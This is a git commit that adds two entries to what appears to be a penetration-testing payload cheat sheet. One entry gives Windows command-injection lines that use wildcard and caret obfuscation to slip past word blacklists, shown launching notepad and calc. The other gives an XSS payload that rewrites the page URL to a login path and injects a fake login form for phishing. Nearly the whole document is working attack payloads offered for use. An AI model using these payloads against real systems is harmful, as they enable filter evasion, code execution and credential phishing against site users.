Windows RCE wildcard + XSS UI redressing

2024-11-10 07:04:22 +00:00 · 2019-01-08 20:49:05 +01:00 · 2019-01-08 20:49:05 +01:00 · ea0bddc18a
commit ea0bddc18a
parent 2e3aef1a19
2 changed files with 15 additions and 0 deletions
--- a/execution/README.md
+++ b/execution/README.md
@ -110,6 +110,12 @@ cat ${test//hhh\/hm/}
 cat ${test//hh??hm/}
 ```

+Bypass blacklisted word with wildcards
+```powershell
+powershell C:\*\*2\n??e*d.*? # notepad
+@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
+```
+
 Bypass zsh/bash/sh blacklist

 ```powershell
--- a/injection/README.md
+++ b/injection/README.md
@ -33,6 +33,15 @@ fclose($fp);
 ?>
 ```

+UI redressing (Sophisticated phishing)
+
+```html
+<script>
+history.replaceState(null, null, '../../../login');
+document.body.innerHTML = "</br></br></br></br></br><h1>Please login to continue</h1><form>Username: <input type='text'>Password: <input type='password'></form><input value='submit' type='submit'>"
+</script>
+```
+
 Keylogger for XSS

 ```javascript